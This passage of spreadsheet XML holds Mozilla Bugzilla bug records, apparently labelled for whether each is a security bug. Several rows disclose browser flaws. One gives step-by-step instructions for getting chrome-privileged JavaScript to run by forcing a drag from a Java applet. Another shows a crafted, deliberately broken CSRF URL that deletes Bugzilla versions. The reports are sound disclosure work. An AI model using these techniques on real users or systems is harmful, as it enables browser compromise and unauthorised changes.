      <c r="B3114" t="inlineStr">
        <is>
          <t>2009-12-01 17:08:54 -0800</t>
        </is>
      </c>
      <c r="C3114" t="inlineStr">
        <is>
          <t>Investigate crash caused by Java plug-in using deleted WMP plug-in object (MSVR-09-0049)</t>
        </is>
      </c>
      <c r="D3114" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E3114" t="n">
        <v>1</v>
      </c>
      <c r="F3114" t="n">
        <v>1</v>
      </c>
      <c r="G3114" t="n">
        <v>6</v>
      </c>
      <c r="H3114" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3114" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3114" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K3114" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3114" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3114" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3114" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3114" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3114" t="inlineStr">
        <is>
          <t>[sg:critical?][fixed-lorentz]</t>
        </is>
      </c>
      <c r="Q3114" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3114" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3114" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3114" t="n">
        <v>1</v>
      </c>
      <c r="U3114" t="n">
        <v>0</v>
      </c>
      <c r="V3114" t="n">
        <v>44</v>
      </c>
      <c r="W3114" t="inlineStr">
        <is>
          <t>Created attachment 415525
MSVR advisory
Microsoft Vulnerability Research reported this issue to security@m.o today.  They included a advisory paper as well as a proof-of-concept for an exploit, though I was unable to get it to work (the author does say it works only about 20% of the time).  The PoC requires Windows Media Player and JRE plug-ins to be installed.  I will upload the attached materials shortly.
The short summary is that plug-in A can get a reference to a NPObject from plug-in B and wait for plug-in B to be unloaded from a page, resulting in plug-in A having a dangling pointer to the freed NPObject.</t>
        </is>
      </c>
      <c r="X3114" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3115">
      <c r="A3115" t="n">
        <v>1282246</v>
      </c>
      <c r="B3115" t="inlineStr">
        <is>
          <t>2016-06-25 11:30:48 -0700</t>
        </is>
      </c>
      <c r="C3115" t="inlineStr">
        <is>
          <t>SEGV on unknown address [@fill] in src/gfx/skia/skia/src/effects/gradients/SkLinearGradient.cpp</t>
        </is>
      </c>
      <c r="D3115" t="inlineStr">
        <is>
          <t>2017-01-05 09:13:07 -0800</t>
        </is>
      </c>
      <c r="E3115" t="n">
        <v>1</v>
      </c>
      <c r="F3115" t="n">
        <v>1</v>
      </c>
      <c r="G3115" t="n">
        <v>3</v>
      </c>
      <c r="H3115" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3115" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3115" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K3115" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L3115" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3115" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3115" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3115" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3115" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main48+]</t>
        </is>
      </c>
      <c r="Q3115" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3115" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3115" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T3115" t="n">
        <v>1</v>
      </c>
      <c r="U3115" t="n">
        <v>0</v>
      </c>
      <c r="V3115" t="n">
        <v>24</v>
      </c>
      <c r="W3115" t="inlineStr">
        <is>
          <t>Created attachment 8765193
stack_trace.txt
This was found while fuzzing an inbound ASan build from June 25th.</t>
        </is>
      </c>
      <c r="X3115" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3116">
      <c r="A3116" t="n">
        <v>1060477</v>
      </c>
      <c r="B3116" t="inlineStr">
        <is>
          <t>2014-08-29 10:25:56 -0700</t>
        </is>
      </c>
      <c r="C3116" t="inlineStr">
        <is>
          <t>logviewer: starttime shouldn't be displayed as seconds since the Unix epoch</t>
        </is>
      </c>
      <c r="D3116" t="inlineStr">
        <is>
          <t>2015-06-01 15:54:46 -0700</t>
        </is>
      </c>
      <c r="E3116" t="n">
        <v>1</v>
      </c>
      <c r="F3116" t="n">
        <v>1</v>
      </c>
      <c r="G3116" t="n">
        <v>7</v>
      </c>
      <c r="H3116" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3116" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3116" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3116" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3116" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3116" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3116" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3116" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3116" t="inlineStr"/>
      <c r="Q3116" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3116" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3116" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3116" t="n">
        <v>1</v>
      </c>
      <c r="U3116" t="n">
        <v>0</v>
      </c>
      <c r="V3116" t="n">
        <v>7</v>
      </c>
      <c r="W3116" t="inlineStr">
        <is>
          <t>eg:
https://treeherder.mozilla.org/ui/logviewer.html#?job_id=282513&amp;repo=mozilla-central
starttime 	1408699960.87
https://github.com/mozilla/treeherder-ui/blob/master/webapp/app/logviewer.html#L15</t>
        </is>
      </c>
      <c r="X3116" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3117">
      <c r="A3117" t="n">
        <v>546909</v>
      </c>
      <c r="B3117" t="inlineStr">
        <is>
          <t>2010-02-18 03:57:33 -0800</t>
        </is>
      </c>
      <c r="C3117" t="inlineStr">
        <is>
          <t>Firefox should not load chrome URLs dragged from plugins</t>
        </is>
      </c>
      <c r="D3117" t="inlineStr">
        <is>
          <t>2010-07-23 13:50:15 -0700</t>
        </is>
      </c>
      <c r="E3117" t="n">
        <v>1</v>
      </c>
      <c r="F3117" t="n">
        <v>1</v>
      </c>
      <c r="G3117" t="n">
        <v>2</v>
      </c>
      <c r="H3117" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3117" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3117" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3117" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3117" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3117" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3117" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3117" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3117" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q3117" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3117" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3117" t="inlineStr">
        <is>
          <t>Firefox 3.7a3</t>
        </is>
      </c>
      <c r="T3117" t="n">
        <v>1</v>
      </c>
      <c r="U3117" t="n">
        <v>0</v>
      </c>
      <c r="V3117" t="n">
        <v>57</v>
      </c>
      <c r="W3117" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Firefox will load a chrome:// URL dragged from a Java applet onto the content area.
In a Java applet, the default 'mouse drag gesture recognizer' can be overridden so that a drag operation is initiated as soon as the mouse button is held down. As no mouse movement is required, a drag+drop can be 'forced' by getting the user to click the mouse button, and placing the drop target under the mouse cursor as soon as the drag operation has begun.
I have devised a test case that will allow chrome-privileged JS to be executed by getting the user to perform only three clicks. It works as follows:
1. Open two popup windows, one in front of the other (first click)
2. In the frontmost window, the user is persuaded to click on a Java applet, starting a drag of a chrome URL (any one will do)
3. Once the drag has started, the frontmost window is resized, so that the content area of the other popup window is underneath the mouse cursor.
4. When the drop is completed, the chrome URL loads in the background popup, and the foreground window is resized to it's original size.
5. The user performs another click on the foreground window. This time, a drag of a malicious Javascript URI is initiated.
6. The foreground window is shrunk again and the mouse button is released over the address bar of the background popup window.
7. The Javascript is executed with chrome privs.
I have tested this on Windows XP with the latest Sun Java plugin. It works on both Firefox 3.6 and latest Trunk. I'm not sure if the drag+drop trickery in the Java applet is actually a vulnerability, but Firefox loading a chrome URI definitely is.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X3117" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3118">
      <c r="A3118" t="n">
        <v>281181</v>
      </c>
      <c r="B3118" t="inlineStr">
        <is>
          <t>2005-02-05 10:13:51 -0800</t>
        </is>
      </c>
      <c r="C3118" t="inlineStr">
        <is>
          <t>[SECURITY] It's way too easy to delete versions/components/milestones etc...</t>
        </is>
      </c>
      <c r="D3118" t="inlineStr">
        <is>
          <t>2008-11-25 11:32:49 -0800</t>
        </is>
      </c>
      <c r="E3118" t="n">
        <v>1</v>
      </c>
      <c r="F3118" t="n">
        <v>1</v>
      </c>
      <c r="G3118" t="n">
        <v>4</v>
      </c>
      <c r="H3118" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3118" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3118" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K3118" t="inlineStr">
        <is>
          <t>2.19</t>
        </is>
      </c>
      <c r="L3118" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3118" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3118" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3118" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3118" t="inlineStr">
        <is>
          <t>[ready for 2.22.1][ready for 2.23.3]</t>
        </is>
      </c>
      <c r="Q3118" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3118" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3118" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T3118" t="n">
        <v>1</v>
      </c>
      <c r="U3118" t="n">
        <v>0</v>
      </c>
      <c r="V3118" t="n">
        <v>37</v>
      </c>
      <c r="W3118" t="inlineStr">
        <is>
          <t>This may have been covered before a long time ago, and not been considered an issue, but if I could 
get an admin to click on the following URL (which is intentionally broken to avoid any accidents, but 
you get the point), this could really mess things up, couldn't it? 
http://bugzilla.mozilla.gorg/editversions.cgi?action=delete&amp;product=Bugzilla&amp;version=2.19
I'm thinking there should be some sort of token passing going on from the intermediate 'are you sure 
you want to delete' page???</t>
        </is>
      </c>
      <c r="X3118" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3119">
      <c r="A3119" t="n">
        <v>1306578</v>
      </c>
      <c r="B3119" t="inlineStr">
        <is>
          <t>2016-09-30 03:30:35 -0700</t>
        </is>
      </c>
      <c r="C3119" t="inlineStr">
        <is>
          <t>In the case of MissingResultsetException .retry() gets called twice per task</t>
        </is>
      </c>
      <c r="D3119" t="inlineStr">
        <is>
          <t>2016-10-03 16:20:48 -0700</t>
        </is>
      </c>
      <c r="E3119" t="n">
        <v>1</v>
      </c>
      <c r="F3119" t="n">
        <v>1</v>
      </c>
      <c r="G3119" t="n">
        <v>7</v>
      </c>
      <c r="H3119" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3119" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3119" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K3119" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3119" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3119" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3119" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3119" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3119" t="inlineStr"/>
      <c r="Q3119" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3119" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3119" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3119" t="n">
        <v>1</v>
      </c>
      <c r="U3119" t="n">
        <v>0</v>
      </c>
      <c r="V3119" t="n">
        <v>5</v>
      </c>
      <c r="W3119" t="inlineStr">
        <is>
          <t>(In reply to Ed Morley [:emorley] from bug 1286578 comment #19)
&gt; I wonder as a follow-up, whether we should add a new queue for these
&gt; "waiting for their push" jobs. It's just I got an alert on Heroku stage
&gt; about queue backlog for the `store_pulse_jobs` queue after this landed.
&gt; 
&gt; With a separate queue we could set different alert thresholds, plus more
&gt; easily monitor whether any backlog was due to missing lots of pushes, or
&gt; just because standard ingestion was getting behind.
(In reply to Cameron Dawson [:camd] from bug 1286578 comment #20)
&gt; This has been deployed to both stage and production now.  The rabbitmq
&gt; queues for SCL3 and Heroku stage  are hovering at zero, so they're emptying
&gt; the whole way, atm.  Should we see if those seem to grow or we get more
&gt; alerts?  Not sure if that was a one-time thing.
The alerts are still occurring:
Name 	treeherder-stage
Queue 	store_pulse_jobs
Current # messages 	1460
Alarm queue regexp 	.*
Alarm threshold 	500
Name 	treeherder-stage
Queue 	store_pulse_jobs
Current # messages 	4743
Alarm queue regexp 	.*
Alarm threshold 	500
Name 	treeherder-stage
Queue 	store_pulse_jobs
Current # messages 	26008
Alarm queue regexp 	.*
Alarm threshold 	500
Also - it seems like there may be a problem somewhere - 26000 jobs are waiting in the queue?</t>
        </is>
      </c>
      <c r="X3119" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3120">
      <c r="A3120" t="n">
        <v>1541726</v>
      </c>
      <c r="B3120" t="inlineStr">
        <is>
          <t>2019-04-03 19:28:57 -0700</t>
        </is>
      </c>
      <c r="C3120" t="inlineStr">
        <is>
          <t>Clicking on pin all makes the pinboard disappear</t>
        </is>
      </c>
      <c r="D3120" t="inlineStr">
        <is>
          <t>2019-04-06 00:04:58 -0700</t>
        </is>
      </c>
      <c r="E3120" t="n">
        <v>1</v>
      </c>
      <c r="F3120" t="n">
        <v>1</v>
      </c>
      <c r="G3120" t="n">
        <v>7</v>
      </c>
      <c r="H3120" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3120" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3120" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3120" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3120" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3120" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3120" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3120" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3120" t="inlineStr"/>
      <c r="Q3120" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3120" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3120" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3120" t="n">
        <v>1</v>
      </c>
      <c r="U3120" t="n">
        <v>0</v>
      </c>
      <c r="V3120" t="n">
        <v>6</v>
      </c>
      <c r="W3120" t="inlineStr">
        <is>
          <t>If I need to pin all failures on a push, the first time I press the pin all button the pinboard disappears and I always need to push it a second time to see the failures I pinned and classify them. 
I'm using Nightly.</t>
        </is>
      </c>
      <c r="X3120" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3121">
      <c r="A3121" t="n">
        <v>815</v>
      </c>
      <c r="B3121" t="inlineStr">
        <is>
          <t>1998-09-14 13:32:15 -0700</t>
        </is>
      </c>
      <c r="C3121" t="inlineStr">
        <is>
          <t>We shouldn't process content inside &lt;NOSCRIPT&gt; tags</t>
        </is>
      </c>
      <c r="D3121" t="inlineStr">
        <is>
          <t>1999-04-21 11:23:15 -0700</t>
        </is>
      </c>
      <c r="E3121" t="n">
        <v>1</v>
      </c>
      <c r="F3121" t="n">
        <v>1</v>
      </c>
      <c r="G3121" t="n">
        <v>3</v>
      </c>
      <c r="H3121" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3121" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3121" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K3121" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3121" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3121" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N3121" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3121" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3121" t="inlineStr"/>
      <c r="Q3121" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3121" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3121" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3121" t="n">
        <v>1</v>
      </c>
      <c r="U3121" t="n">
        <v>0</v>
      </c>
      <c r="V3121" t="n">
        <v>7</v>
      </c>
      <c r="W3121" t="inlineStr">
        <is>
          <t>Currently we're processing content inside NOSCRIPT tags.  This problem is most
visible on various Netcenter pages, the first of which being the sign in page.
The sign in page uses a meta-redirect inside a NOSCRIPT tag to avoid non script
browsers.  We need to get this fixed if we want to be able to test Netcenter in
NGLayout.</t>
        </is>
      </c>
      <c r="X3121" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3122">
      <c r="A3122" t="n">
        <v>1584947</v>
      </c>
      <c r="B3122" t="inlineStr">
        <is>
          <t>2019-09-30 05:05:56 -0700</t>
        </is>
      </c>
      <c r="C3122" t="inlineStr">
        <is>
          <t>Display measurement units on the Graphs view</t>
        </is>
      </c>
      <c r="D3122" t="inlineStr">
        <is>
          <t>2020-01-08 02:05:08 -0800</t>
        </is>
      </c>
      <c r="E3122" t="n">
        <v>1</v>
      </c>
      <c r="F3122" t="n">
        <v>1</v>
      </c>
      <c r="G3122" t="n">
        <v>7</v>
      </c>
      <c r="H3122" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3122" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3122" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K3122" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3122" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3122" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3122" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3122" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3122" t="inlineStr"/>
      <c r="Q3122" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3122" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3122" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3122" t="n">
        <v>1</v>
      </c>
      <c r="U3122" t="n">
        <v>0</v>
      </c>
      <c r="V3122" t="n">
        <v>3</v>
      </c>
      <c r="W3122" t="inlineStr">
        <is>
          <t>So that developers know what data they're reading.</t>
        </is>
      </c>
      <c r="X3122" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3123">
      <c r="A3123" t="n">
        <v>987794</v>
      </c>
      <c r="B3123" t="inlineStr">
        <is>
          <t>2014-03-25 09:26:37 -0700</t>
        </is>
      </c>
      <c r="C3123" t="inlineStr">
        <is>
          <t>named getters can fool Xrays</t>
        </is>
      </c>
      <c r="D3123" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:51 -0700</t>
        </is>
      </c>
      <c r="E3123" t="n">
        <v>1</v>
      </c>
      <c r="F3123" t="n">
        <v>1</v>
      </c>
      <c r="G3123" t="n">
        <v>3</v>
      </c>
      <c r="H3123" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3123" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3123" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K3123" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3123" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3123" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3123" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3123" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3123" t="inlineStr">
        <is>
          <t>[adv-main35+]</t>
        </is>
      </c>
      <c r="Q3123" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3123" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3123" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T3123" t="n">
        <v>1</v>
      </c>
      <c r="U3123" t="n">
        <v>0</v>
      </c>
      <c r="V3123" t="n">
        <v>38</v>
      </c>
      <c r="W3123" t="inlineStr">
        <is>
          <t>I was talking with jorendorff, and started getting worried about DOM objects with named accessors fooling the XrayWrapper by either:
(a) shadowing a native property (i.e. getElementById)
or
(b) shadowing an ES property.
We basically had this issue for cross-origin windows in bug 860494.
I'm getting a bug on file here so that I can write some tests, then we can assess whether it's actually a problem or not.</t>
        </is>
      </c>
      <c r="X3123" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3124">
      <c r="A3124" t="n">
        <v>1241217</v>
      </c>
      <c r="B3124" t="inlineStr">
        <is>
          <t>2016-01-20 10:34:12 -0800</t>
        </is>
      </c>
      <c r="C3124" t="inlineStr">
        <is>
          <t>crash in nsPresContext::GetParentPresContext (from nsRefreshDriver::IsWaitingForPaint())</t>
        </is>
      </c>
      <c r="D3124" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:22 -0700</t>
        </is>
      </c>
      <c r="E3124" t="n">
        <v>1</v>
      </c>
      <c r="F3124" t="n">
        <v>1</v>
      </c>
      <c r="G3124" t="n">
        <v>3</v>
      </c>
      <c r="H3124" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3124" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3124" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3124" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3124" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3124" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N3124" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3124" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3124" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+][post-critsmash-triage][fixed by bug 1241651]</t>
        </is>
      </c>
      <c r="Q3124" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3124" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3124" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3124" t="n">
        <v>1</v>
      </c>
      <c r="U3124" t="n">
        <v>0</v>
      </c>
      <c r="V3124" t="n">
        <v>14</v>
      </c>
      <c r="W3124" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-afcbf2df-d834-429d-9fb8-d56922160114.
=============================================================
UAF read (~70 in the last week), called from nsRefreshDriver::IsWaitingForPaint().  Very likely the view has been freed; something isn't holding a ref it needs probably.
Goes back to at least 38, and likely much further - some indications in crashstats indicate 22, though those may be different crashes in the same function:
22 Android crash is nsViewManager::CallWillPaintOnObservers() https://crash-stats.mozilla.com/report/index/ac213ffa-6494-46c9-b694-ccc402160117
22 windows: IsDOMPaintEventWaiting() - https://crash-stats.mozilla.com/report/index/70e6bad5-e19a-4ab9-a3a9-dded82160114
CC/NI Jet for triage</t>
        </is>
      </c>
      <c r="X3124" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3125">
      <c r="A3125" t="n">
        <v>858249</v>
      </c>
      <c r="B3125" t="inlineStr">
        <is>
          <t>2013-04-04 14:16:36 -0700</t>
        </is>
      </c>
      <c r="C3125" t="inlineStr">
        <is>
          <t>Add "Registered Developers" graph to global stats dashboard</t>
        </is>
      </c>
      <c r="D3125" t="inlineStr">
        <is>
          <t>2013-10-30 13:30:19 -0700</t>
        </is>
      </c>
      <c r="E3125" t="n">
        <v>1</v>
      </c>
      <c r="F3125" t="n">
        <v>1</v>
      </c>
      <c r="G3125" t="n">
        <v>6</v>
      </c>
      <c r="H3125" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3125" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J3125" t="inlineStr">
        <is>
          <t>Statistics</t>
        </is>
      </c>
      <c r="K3125" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L3125" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3125" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3125" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3125" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3125" t="inlineStr"/>
      <c r="Q3125" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3125" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3125" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3125" t="n">
        <v>1</v>
      </c>
      <c r="U3125" t="n">
        <v>0</v>
      </c>
      <c r="V3125" t="n">
        <v>9</v>
      </c>
      <c r="W3125" t="inlineStr">
        <is>
          <t>Please add a graph showing the total Registered Developers to the global stats dashboard (https://marketplace.firefox.com/statistics/).  The same format as all the other graphs that are there is fine.  The only selector will be by date, same as our other graphs.
This graph is publicly available.</t>
        </is>
      </c>
      <c r="X3125" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3126">
      <c r="A3126" t="n">
        <v>541530</v>
      </c>
      <c r="B3126" t="inlineStr">
        <is>
          <t>2010-01-22 15:25:31 -0800</t>
        </is>
      </c>
      <c r="C3126" t="inlineStr">
        <is>
          <t>Restore paranoid location object protecting code</t>
        </is>
      </c>
      <c r="D3126" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3126" t="n">
        <v>1</v>
      </c>
      <c r="F3126" t="n">
        <v>1</v>
      </c>
      <c r="G3126" t="n">
        <v>3</v>
      </c>
      <c r="H3126" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3126" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3126" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3126" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3126" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3126" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
